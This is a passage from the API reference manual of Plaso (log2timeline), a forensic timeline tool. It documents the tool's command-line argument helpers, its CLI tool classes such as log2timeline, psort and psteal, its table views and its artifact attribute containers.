The tagging analysis plugin CLI arguments helper. class plaso.cli.helpers.tagging_analysis.TaggingAnalysisArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Tagging analysis plugin CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. CATEGORY = 'analysis' DESCRIPTION = 'Argument helper for the Tagging analysis plugin.' NAME = 'tagging' classmethod ParseOptions(options, analysis_plugin) Parses and validates options. Parameters

76 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• options (argparse.Namespace) – parser options. • analysis_plugin (AnalysisPlugin) – analysis plugin to configure. Raises • BadConfigObject – when the output module object is of the wrong type. • BadConfigOption – when a configuration parameter fails validation. plaso.cli.helpers.temporary_directory module

The temporary directory CLI arguments helper. class plaso.cli.helpers.temporary_directory.TemporaryDirectoryArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Temporary directory CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Temporary directory command line arguments.' NAME = 'temporary_directory' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – when the temporary directory does not exists.

plaso.cli.helpers.text_prepend module

The text prepend CLI arguments helper. class plaso.cli.helpers.text_prepend.TextPrependArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Text prepend CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

5.1. Subpackages 77 Plaso (log2timeline), Release 20210606

Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Text prepend command line arguments.' NAME = 'text_prepend' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises BadConfigObject – when the configuration object is of the wrong type. plaso.cli.helpers.vfs_backend module

The VFS back-end CLI arguments helper. class plaso.cli.helpers.vfs_backend.VFSBackEndArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper VFS back-end CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'dfVFS back-end command line arguments.' NAME = 'vfs_backend' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises BadConfigObject – when the configuration object is of the wrong type. plaso.cli.helpers.viper_analysis module

The Viper analysis plugin CLI arguments helper. class plaso.cli.helpers.viper_analysis.ViperAnalysisArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Viper analysis plugin CLI arguments helper.

78 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

classmethod AddArguments(argument_group) Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. CATEGORY = 'analysis' DESCRIPTION = 'Argument helper for the Viper analysis plugin.' NAME = 'viper' classmethod ParseOptions(options, analysis_plugin) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • analysis_plugin (ViperAnalysisPlugin) – analysis plugin to configure. Raises • BadConfigObject – when the output module object is of the wrong type. • BadConfigOption – when unable to connect to Viper instance. plaso.cli.helpers.virustotal_analysis module

The VirusTotal analysis plugin CLI arguments helper. class plaso.cli.helpers.virustotal_analysis.VirusTotalAnalysisArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper VirusTotal analysis plugin CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. CATEGORY = 'analysis' DESCRIPTION = 'Argument helper for the VirusTotal analysis plugin.' NAME = 'virustotal' classmethod ParseOptions(options, analysis_plugin) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • analysis_plugin (VirusTotalAnalysisPlugin) – analysis plugin to configure. Raises • BadConfigObject – when the output module object is of the wrong type.

5.1. Subpackages 79 Plaso (log2timeline), Release 20210606

• BadConfigOption – when a configuration parameter fails validation or when unable to connect to VirusTotal. plaso.cli.helpers.windows_services_analysis module

The Windows Services analysis plugin CLI arguments helper. class plaso.cli.helpers.windows_services_analysis.WindowsServicesAnalysisArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Windows Services analysis plugin CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. CATEGORY = 'analysis' DESCRIPTION = 'Argument helper for the Windows Services analysis plugin.' NAME = 'windows_services' classmethod ParseOptions(options, analysis_plugin) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • analysis_plugin (WindowsServicePlugin) – analysis plugin to configure. Raises BadConfigObject – when the output module object is of the wrong type. plaso.cli.helpers.workers module

The worker processes CLI arguments helper. class plaso.cli.helpers.workers.WorkersArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Worker processes CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Worker processes command line arguments.' NAME = 'workers' classmethod ParseOptions(options, configuration_object) Parses and validates options.

80 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – when a configuration parameter fails validation. plaso.cli.helpers.xlsx_output module

The XLSX output module CLI arguments helper. class plaso.cli.helpers.xlsx_output.XLSXOutputArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper XLSX output module CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. CATEGORY = 'output' DESCRIPTION = 'Argument helper for the XLSX output module.' NAME = 'xlsx' classmethod ParseOptions(options, output_module) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • output_module (XLSXOutputModule) – output module to configure. Raises • BadConfigObject – when the output module object is of the wrong type. • BadConfigOption – when the output filename was not provided.

plaso.cli.helpers.yara_rules module

The YARA rules CLI arguments helper. class plaso.cli.helpers.yara_rules.YaraRulesArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper YARA rules CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group.

5.1. Subpackages 81 Plaso (log2timeline), Release 20210606

This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'YARA rules command line arguments.' NAME = 'yara_rules' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – when the Yara rules file cannot be read or parsed.

Module contents

This file imports Python modules that register CLI helpers.

Submodules plaso.cli.analysis_tool module

Shared functionality for an analysis CLI tool. class plaso.cli.analysis_tool.AnalysisTool(input_reader=None, output_writer=None) Bases: plaso.cli.tools.CLITool, plaso.cli.tool_options.AnalysisPluginOptions, plaso.cli. tool_options.ProfilingOptions, plaso.cli.tool_options.StorageFileOptions Analysis CLI tool. list_analysis_plugins True if information about the analysis plugins should be shown. Type bool

plaso.cli.extraction_tool module

Shared functionality for an extraction CLI tool. class plaso.cli.extraction_tool.ExtractionTool(input_reader=None, output_writer=None) Bases: plaso.cli.storage_media_tool.StorageMediaTool, plaso.cli.tool_options. HashersOptions, plaso.cli.tool_options.ProfilingOptions, plaso.cli.tool_options. StorageFileOptions Extraction CLI tool. list_time_zones True if the time zones should be listed.

82 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type bool AddPerformanceOptions(argument_group) Adds the performance options to the argument group. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. AddProcessingOptions(argument_group) Adds the processing options to the argument group. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. AddTimeZoneOption(argument_group) Adds the time zone option to the argument group. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. ExtractEventsFromSources() Processes the sources and extracts events. Raises • BadConfigOption – if the storage file path is invalid, or the storage format not supported, or there was a failure to writing to the storage. • IOError – if the extraction engine could not write to the storage. • OSError – if the extraction engine could not write to the storage. • SourceScannerError – if the source scanner could not find a supported file system. • UserAbort – if the user initiated an abort. ListParsersAndPlugins() Lists information about the available parsers and plugins. plaso.cli.image_export_tool module

The image export CLI tool. class plaso.cli.image_export_tool.ImageExportTool(input_reader=None, output_writer=None) Bases: plaso.cli.storage_media_tool.StorageMediaTool Class that implements the image export CLI tool. has_filters True if filters have been specified via the options. Type bool list_signature_identifiers True if information about the signature identifiers should be shown. Type bool AddFilterOptions(argument_group) Adds the filter options to the argument group. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. DESCRIPTION = 'This is a simple collector designed to export files inside an image, both within a regular RAW image as well as inside a VSS. The tool uses a collection filter that uses the same syntax as a targeted plaso filter.' EPILOG = 'And that is how you export files, plaso style.'

5.1. Subpackages 83 Plaso (log2timeline), Release 20210606

ListSignatureIdentifiers() Lists the signature identifier. Raises BadConfigOption – if the data location is invalid. NAME = 'image_export' ParseArguments(arguments) Parses the command line arguments. Parameters arguments (list[str]) – command line arguments. Returns True if the arguments were successfully parsed. Return type bool ParseOptions(options) Parses the options and initializes the front-end. Parameters options (argparse.Namespace) – command line arguments. Raises BadConfigOption – if the options are invalid. PrintFilterCollection() Prints the filter collection. ProcessSources() Processes the sources. Raises • SourceScannerError – if the source scanner could not find a supported file system. • UserAbort – if the user initiated an abort. plaso.cli.log2timeline_tool module

The log2timeline CLI tool. class plaso.cli.log2timeline_tool.Log2TimelineTool(input_reader=None, output_writer=None) Bases: plaso.cli.extraction_tool.ExtractionTool Log2timeline CLI tool. dependencies_check True if the availability and versions of dependencies should be checked. Type bool list_hashers True if the hashers should be listed. Type bool list_parsers_and_plugins True if the parsers and plugins should be listed. Type bool list_profilers True if the profilers should be listed. Type bool show_info True if information about hashers, parsers, plugins, etc. should be shown.

84 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type bool AddLegacyStorageOptions(argument_parser) Adds the legacy storage options to the argument group. Parameters argument_parser (argparse.ArgumentParser) – argparse argument parser. AddStorageOptions(argument_group) Adds the storage options to the argument group. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. DESCRIPTION = '\nlog2timeline is a command line tool to extract events from individual \nfiles, recursing a directory (e.g. mount point) or storage media \nimage or device.\n\nMore information can be gathered from here:\n https://plaso.readthedocs.io/en/latest/sources/user/Using-log2timeline.html\n' EPILOG = '\nExample usage:\n\nRun the tool against a storage media image (full kitchen sink)\n log2timeline.py /cases/mycase/storage.plaso ímynd.dd\n\nInstead of answering questions, indicate some of the options on the\ncommand line (including data from particular VSS stores).\n log2timeline.py --vss_stores 1,2 /cases/plaso_vss.plaso image.E01\n\nAnd that is how you build a timeline using log2timeline...\n' NAME = 'log2timeline' ParseArguments(arguments) Parses the command line arguments. Parameters arguments (list[str]) – command line arguments. Returns True if the arguments were successfully parsed. Return type bool ParseOptions(options) Parses the options. Parameters options (argparse.Namespace) – command line arguments. Raises BadConfigOption – if the options are invalid. ShowInfo() Shows information about available hashers, parsers, plugins, etc. plaso.cli.logger module

The cli sub module logger. plaso.cli.pinfo_tool module

The pinfo CLI tool. class plaso.cli.pinfo_tool.PinfoTool(input_reader=None, output_writer=None) Bases: plaso.cli.tools.CLITool, plaso.cli.tool_options.StorageFileOptions Pinfo CLI tool. compare_storage_information True if the tool is used to compare stores. Type bool

5.1. Subpackages 85 Plaso (log2timeline), Release 20210606

generate_report True if a predefined report type should be generated. Type bool list_reports True if the report types should be listed. Type bool list_sections True if the section types should be listed. Type bool CompareStores() Compares the contents of two stores. Returns True if the content of the stores is identical. Return type bool Raises BadConfigOption – if the storage file format is not supported. DESCRIPTION = 'Shows information about a Plaso storage file, for example how it was collected, what information was extracted from a source, etc.' GenerateReport() Generates a report. Raises BadConfigOption – if the storage file format is not supported. ListReports() Lists information about the available report types. ListSections() Lists information about the available sections. NAME = 'pinfo' ParseArguments(arguments) Parses the command line arguments. Parameters arguments (list[str]) – command line arguments. Returns True if the arguments were successfully parsed. Return type bool ParseOptions(options) Parses the options. Parameters options (argparse.Namespace) – command line arguments. Raises BadConfigOption – if the options are invalid. PrintStorageInformation() Prints the storage information. Raises BadConfigOption – if the storage file format is not supported.

86 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.cli.psort_tool module

The psort CLI tool. class plaso.cli.psort_tool.PsortTool(input_reader=None, output_writer=None) Bases: plaso.cli.analysis_tool.AnalysisTool, plaso.cli.tool_options.OutputModuleOptions Psort CLI tool. list_analysis_plugins True if information about the analysis plugins should be shown. Type bool list_language_identifiers True if information about the language identifiers should be shown. Type bool list_output_modules True if information about the output modules should be shown. Type bool list_profilers True if the profilers should be listed. Type bool AddProcessingOptions(argument_group) Adds processing options to the argument group Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. DESCRIPTION = 'Application to read, filter and process output from a plaso storage file.' NAME = 'psort' ParseArguments(arguments) Parses the command line arguments. Parameters arguments (list[str]) – command line arguments. Returns True if the arguments were successfully parsed. Return type bool ParseOptions(options) Parses the options. Parameters options (argparse.Namespace) – command line arguments. Raises BadConfigOption – if the options are invalid. ProcessStorage() Processes a plaso storage file. Raises • BadConfigOption – when a configuration parameter fails validation or the storage file cannot be opened with read access. • RuntimeError – if a non-recoverable situation is encountered.

5.1. Subpackages 87 Plaso (log2timeline), Release 20210606 plaso.cli.psteal_tool module

The psteal CLI tool. class plaso.cli.psteal_tool.PstealTool(input_reader=None, output_writer=None) Bases: plaso.cli.extraction_tool.ExtractionTool, plaso.cli.tool_options.HashersOptions, plaso.cli.tool_options.OutputModuleOptions, plaso.cli.tool_options.StorageFileOptions Psteal CLI tool. Psteal extract events from the provided source and stores them in an intermediate storage file. After extraction an output log file is created. This mimics the behavior of the log2timeline.pl. The tool currently doesn’t support any of the log2timeline or psort tools’ flags. dependencies_check True if the availability and versions of dependencies should be checked. Type bool list_hashers True if the hashers should be listed. Type bool list_language_identifiers True if information about the language identifiers should be shown. Type bool list_output_modules True if information about the output modules should be shown. Type bool list_parsers_and_plugins True if the parsers and plugins should be listed. Type bool AddStorageOptions(argument_group) Adds the storage options to the argument group. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. AnalyzeEvents() Analyzes events from a plaso storage file and generate a report. Raises • BadConfigOption – when a configuration parameter fails validation or the storage file cannot be opened with read access. • RuntimeError – if a non-recoverable situation is encountered. DESCRIPTION = '\npsteal is a command line tool to extract events from individual \nfiles, recursing a directory (e.g. mount point) or storage media \nimage or device. The output events will be stored in a storage file.\nThis tool will then read the output and process the events into a CSV \nfile.\n\nMore information can be gathered from here:\n https://plaso.readthedocs.io/en/latest/sources/user/Using-log2timeline.html\n' EPILOG = '\nExample usage:\n\nRun the tool against a storage media image (full kitchen sink)\n psteal.py --source ímynd.dd -w imynd.timeline.txt\n\nAnd that is how you build a timeline using psteal...\n'

88 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

NAME = 'psteal' ParseArguments(arguments) Parses the command line arguments. Parameters arguments (list[str]) – command line arguments. Returns True if the arguments were successfully parsed. Return type bool ParseOptions(options) Parses tool specific options. Parameters options (argparse.Namespace) – command line arguments. Raises BadConfigOption – if the options are invalid. plaso.cli.status_view module

The status view. class plaso.cli.status_view.StatusView(output_writer, tool_name) Bases: object Processing status view. GetAnalysisStatusUpdateCallback() Retrieves the analysis status update callback function. Returns status update callback function or None if not available. Return type function GetExtractionStatusUpdateCallback() Retrieves the extraction status update callback function. Returns status update callback function or None if not available. Return type function MODE_LINEAR = 'linear' MODE_WINDOW = 'window' PrintExtractionStatusHeader(processing_status) Prints the extraction status header. Parameters processing_status (ProcessingStatus) – processing status. PrintExtractionSummary(processing_status) Prints a summary of the extraction. Parameters processing_status (ProcessingStatus) – processing status. SetMode(mode) Sets the mode. Parameters mode (str) – status view mode. SetSourceInformation(source_path, source_type, artifact_filters=None, filter_file=None) Sets the source information. Parameters • source_path (str) – path of the source.

5.1. Subpackages 89 Plaso (log2timeline), Release 20210606

• source_type (str) – source type. • artifact_filters (Optional[list[str]]) – names of artifact definitions to use as filters. • filter_file (Optional[str]) – filter file. SetStorageFileInformation(storage_file_path) Sets the storage file information. Parameters storage_file_path (str) – path to the storage file. plaso.cli.storage_media_tool module

The storage media CLI tool. class plaso.cli.storage_media_tool.StorageMediaTool(input_reader=None, output_writer=None) Bases: plaso.cli.tools.CLITool CLI tool that supports a storage media device or image as input. AddCredentialOptions(argument_group) Adds the credential options to the argument group. The credential options are use to unlock encrypted volumes. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. AddStorageMediaImageOptions(argument_group) Adds the storage media image options to the argument group. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. AddVSSProcessingOptions(argument_group) Adds the VSS processing options to the argument group. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. ScanSource(source_path) Scans the source path for volume and file systems. This function sets the internal source path specification and source type values. Parameters source_path (str) – path to the source. Raises SourceScannerError – if the format of or within the source is not supported. class plaso.cli.storage_media_tool.StorageMediaToolMediator(*args: Any, **kwargs: Any) Bases: dfvfs.helpers.command_line. Mediator between the storage media tool and user input. ParseVolumeIdentifiersString(volume_identifiers_string, prefix='v') Parses a user specified volume identifiers string. Parameters • volume_identifiers_string (str) – user specified volume identifiers. A range of volumes can be defined as: “3..5”. Multiple volumes can be defined as: “1,3,5” (alistof comma separated values). Ranges and lists can also be combined as: “1,3..5”. The first volume is 1. All volumes can be defined as: “all”. • prefix (Optional[str]) – volume identifier prefix. Returns volume identifiers with prefix or the string “all”.

90 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Return type list[str] Raises ValueError – if the volume identifiers string is invalid. PromptUserForVSSCurrentVolume() Prompts the user if the current volume with VSS should be processed. Returns True if the current volume with VSS should be processed. Return type bool class plaso.cli.storage_media_tool.StorageMediaToolVolumeScanner(*args: Any, **kwargs: Any) Bases: dfvfs.helpers.volume_scanner. Volume scanner used by the storage media tool. ScanSource(source_path, options, base_path_specs) Scans the source path for volume and file systems. This function sets the internal source path specification and source type values. Parameters • source_path (str) – path to the source. • options (VolumeScannerOptions) – volume scanner options. • base_path_specs (list[PathSpec]) – file system base path specifications. Returns source scanner context. Return type dfvfs.SourceScannerContext Raises dfvfs.ScannerError – if the format of or within the source is not supported. property source_type type of source. Type str class plaso.cli.storage_media_tool.StorageMediaToolVolumeScannerOptions(*args: Any, **kwargs: Any) Bases: dfvfs.helpers.volume_scanner. Volume scanner options used by the storage media tool. snapshots_only True if the current volume of a volume with snapshots should be ignored. Type bool plaso.cli.time_slices module

The time slice. class plaso.cli.time_slices.TimeSlice(event_timestamp, duration=5) Bases: object Time slice. The time slice is used to provide a context of events around an event of interest. duration duration of the time slice in minutes. Type int

5.1. Subpackages 91 Plaso (log2timeline), Release 20210606

event_timestamp event timestamp of the time slice or None. Type int property end_timestamp slice end timestamp or None. Type int property start_timestamp slice start timestamp or None. Type int

plaso.cli.tool_options module

The CLI tool options mix-ins. class plaso.cli.tool_options.AnalysisPluginOptions Bases: object Analysis plugin options mix-in. ListAnalysisPlugins() Lists the analysis modules. class plaso.cli.tool_options.HashersOptions Bases: object Hashers options mix-in. ListHashers() Lists information about the available hashers. class plaso.cli.tool_options.OutputModuleOptions Bases: object Output module options mix-in. list_time_zones True if the time zones should be listed. Type bool AddOutputOptions(argument_group) Adds the output options to the argument group. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. ListLanguageIdentifiers() Lists the language identifiers. ListOutputModules() Lists the output modules. class plaso.cli.tool_options.ProfilingOptions Bases: object Profiling options mix-in. ListProfilers() Lists information about the available profilers.

92 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 class plaso.cli.tool_options.StorageFileOptions Bases: object Storage file options mix-in. AddStorageOptions(argument_parser) Adds the storage options to the argument group. Parameters argument_parser (argparse.ArgumentParser) – argparse argument parser. plaso.cli.tools module

The command line interface (CLI) tools classes. class plaso.cli.tools.CLIInputReader(encoding='utf-8') Bases: object Command line interface input reader interface. abstract Read() Reads a string from the input. Returns input. Return type str class plaso.cli.tools.CLIOutputWriter(encoding='utf-8') Bases: object Command line interface output writer interface. abstract Write(string) Writes a string to the output. Parameters string (str) – output. class plaso.cli.tools.CLITool(input_reader=None, output_writer=None) Bases: object Command line interface tool. preferred_encoding preferred encoding of single-byte or multi-byte character strings, sometimes referred to as extended ASCII. Type str show_troubleshooting True if troubleshooting information should be shown. Type bool AddBasicOptions(argument_group) Adds the basic options to the argument group. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. AddInformationalOptions(argument_group) Adds the informational options to the argument group. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group. AddLogFileOptions(argument_group) Adds the log file option to the argument group. Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.

5.1. Subpackages 93 Plaso (log2timeline), Release 20210606

CheckOutDated() Checks if the version of plaso is outdated and warns the user. GetCommandLineArguments() Retrieves the command line arguments. Returns command line arguments. Return type str GetVersionInformation() Retrieves the version information. Returns version information. Return type str ListTimeZones() Lists the timezones. NAME = '' ParseNumericOption(options, name, base=10, default_value=None) Parses a numeric option. If the option is not set the default value is returned. Parameters • options (argparse.Namespace) – command line arguments. • name (str) – name of the numeric option. • base (Optional[int]) – base of the numeric value. • default_value (Optional[object]) – default value. Returns numeric value. Return type int Raises BadConfigOption – if the options are invalid. ParseStringOption(options, argument_name, default_value=None) Parses a string command line argument. Parameters • options (argparse.Namespace) – command line arguments. • argument_name (str) – name of the command line argument. • default_value (Optional[object]) – default value of the command line argument. Returns command line argument value. If the command line argument is not set the default value will be returned. Return type object Raises BadConfigOption – if the command line argument value cannot be converted to a Uni- code string. PrintSeparatorLine() Prints a separator line.

94 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

property data_location path of the data files. Type str class plaso.cli.tools.FileObjectInputReader(file_object, encoding='utf-8') Bases: plaso.cli.tools.CLIInputReader File object command line interface input reader. This input reader relies on the file-like object having a readline method. Read() Reads a string from the input. Returns input. Return type str class plaso.cli.tools.FileObjectOutputWriter(file_object, encoding='utf-8') Bases: plaso.cli.tools.CLIOutputWriter File object command line interface output writer. This output writer relies on the file-like object having a write method. Write(string) Writes a string to the output. Parameters string (str) – output. class plaso.cli.tools.StdinInputReader(encoding='utf-8') Bases: plaso.cli.tools.FileObjectInputReader Stdin command line interface input reader. Read() Reads a string from the input. Returns input. Return type str class plaso.cli.tools.StdoutOutputWriter(encoding='utf-8') Bases: plaso.cli.tools.FileObjectOutputWriter Stdout command line interface output writer. Write(string) Writes a string to the output. Parameters string (str) – output. plaso.cli.views module

View classes. class plaso.cli.views.BaseTableView(column_names=None, title=None, title_level=3) Bases: object Table view interface. AddRow(values) Adds a row of values. Parameters values (list[object]) – values.

5.1. Subpackages 95 Plaso (log2timeline), Release 20210606

Raises ValueError – if the number of values is out of bounds. abstract Write(output_writer) Writes the table to the output writer. Parameters output_writer (OutputWriter) – output writer. class plaso.cli.views.CLITableView(column_names=None, title=None, title_level=3) Bases: plaso.cli.views.BaseTableView Command line table view. Note that currently this table view does not support more than 2 columns. AddRow(values) Adds a row of values. Parameters values (list[object]) – values. Raises ValueError – if the number of values is out of bounds. Write(output_writer) Writes the table to the output writer. Parameters output_writer (OutputWriter) – output writer. Raises RuntimeError – if the title exceeds the maximum width or if the table has more than 2 columns or if the column width is out of bounds. class plaso.cli.views.CLITabularTableView(column_names=None, column_sizes=None, title=None) Bases: plaso.cli.views.BaseTableView Command line tabular table view interface. AddRow(values) Adds a row of values. Parameters values (list[object]) – values. Raises ValueError – if the number of values is out of bounds. Write(output_writer) Writes the table to the output writer. Parameters output_writer (OutputWriter) – output writer. class plaso.cli.views.MarkdownTableView(column_names=None, title=None, title_level=3) Bases: plaso.cli.views.BaseTableView Markdown table view. Write(output_writer) Writes the table to the output writer. Parameters output_writer (OutputWriter) – output writer. class plaso.cli.views.ViewsFactory Bases: object Views factory. FORMAT_TYPE_CLI = 'cli' FORMAT_TYPE_MARKDOWN = 'markdown' classmethod GetTableView(format_type, column_names=None, title=None, title_level=3) Retrieves a table view.

96 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters • format_type (str) – table view format type. • column_names (Optional[list[str]]) – column names. • title (Optional[str]) – title. • title_level (Optional[int]) – title heading level. Returns table view. Return type BaseTableView Raises ValueError – if the format type is not supported.

Module contents

5.1.4 plaso.containers package

Submodules plaso.containers.analyzer_result module

Analyzer result attribute container. class plaso.containers.analyzer_result.AnalyzerResult Bases: plaso.containers.interface.AttributeContainer Attribute container to store results of analyzers. Analyzers can produce results with different attribute names. For example, the ‘hashing’ analyzer could produce an attribute ‘md5_hash’, with a value of ‘d41d8cd98f00b204e9800998ecf8427e’. analyzer_name name of the analyzer that produce the result. Type str attribute_name name of the attribute produced. Type str attribute_value value of the attribute produced. Type str CONTAINER_TYPE = 'analyzer_result'

5.1. Subpackages 97 Plaso (log2timeline), Release 20210606

plaso.containers.artifacts module

Artifact attribute containers. class plaso.containers.artifacts.ArtifactAttributeContainer Bases: plaso.containers.interface.AttributeContainer Base class to represent an artifact attribute container. class plaso.containers.artifacts.EnvironmentVariableArtifact(case_sensitive=True, name=None, value=None) Bases: plaso.containers.artifacts.ArtifactAttributeContainer Environment variable artifact attribute container. Also see: https://en.wikipedia.org/wiki/Environment_variable case_sensitive True if environment variable name is case sensitive. Type bool name environment variable name such as “SystemRoot” as in “%SystemRoot%” or “HOME” as in “$HOME”. Type str value environment variable value such as “C:Windows” or “/home/user”. Type str CONTAINER_TYPE = 'environment_variable' class plaso.containers.artifacts.HostnameArtifact(name=None, schema='DNS') Bases: plaso.containers.artifacts.ArtifactAttributeContainer Hostname artifact attribute container. Also see: https://en.wikipedia.org/wiki/Hostname Cybox / Stix Hostname Object name name of the host according to the naming schema. Type str schema naming schema such as “DNS”, “NIS”, “SMB/NetBIOS”. Type str CONTAINER_TYPE = 'hostname' class plaso.containers.artifacts.OperatingSystemArtifact(family=None, product=None, version=None) Bases: plaso.containers.artifacts.ArtifactAttributeContainer Operating system artifact attribute container. family operating system family name, such as “Linux”, “MacOS” or “Windows”, defined in definitions.OPERATING_SYSTEM_FAMILIES. This value is used to programmatically link a parser preset to an operating system and therefore must be one of predefined values. Type str

98 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

name operating system name, such as “macOS Mojave” or “Windows XP”. This value is used to programmatically link a parser preset to an operating system and therefore must be one of predefined values. Type str product product information, such as “macOS Mojave” or “Windows Professional XP”. This value is typically obtained from the source data. Type str version version, such as “10.14.1” or “5.1”. This value is typically obtained from the source data. Type str CONTAINER_TYPE = 'operating_system' IsEquivalent(other) Determines if 2 operating system artifacts are equivalent. This function compares the operating systems based in order of: * name derived from product * family and version * family Parameters other (OperatingSystemArtifact) – operating system artifact attribute container to compare with. Returns True if the operating systems are considered equivalent, False if the most specific criteria do no match, or no criteria are available. Return type bool property version_tuple version tuple or None if version is not set or invalid. Type tuple[int] class plaso.containers.artifacts.PathArtifact(data_stream=None, path=None, path_segment_separator='/') Bases: plaso.containers.artifacts.ArtifactAttributeContainer Path artifact attribute container. data_stream name of a data stream. Type str path_segment_separator path segment separator. Type str path_segments path segments. Type list[str] CONTAINER_TYPE = 'path' ContainedIn(other) Determines if the path are contained in other.

5.1. Subpackages 99 Plaso (log2timeline), Release 20210606

Parameters other (str) – path to compare against. Returns True if the path is contained in other. Return type bool __eq__(other) Determines if the path is equal to other. Parameters other (str) – path to compare against. Returns True if the path are equal to other. Return type bool __ge__(other) Determines if the path are greater than or equal to other. Parameters other (str) – path to compare against. Returns True if the path are greater than or equal to other. Return type bool Raises ValueError – if other is not an instance of string. __gt__(other) Determines if the path are greater than other. Parameters other (str) – path to compare against. Returns True if the path are greater than other. Return type bool Raises ValueError – if other is not an instance of string. __le__(other) Determines if the path are greater than or equal to other. Parameters other (str) – path to compare against. Returns True if the path are greater than or equal to other. Return type bool Raises ValueError – if other is not an instance of string. __lt__(other) Determines if the path are less than other. Parameters other (str) – path to compare against. Returns True if the path are less than other. Return type bool Raises ValueError – if other is not an instance of string. __ne__(other) Determines if the path are not equal to other. Parameters other (str) – path to compare against. Returns True if the path are not equal to other. Return type bool

100 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

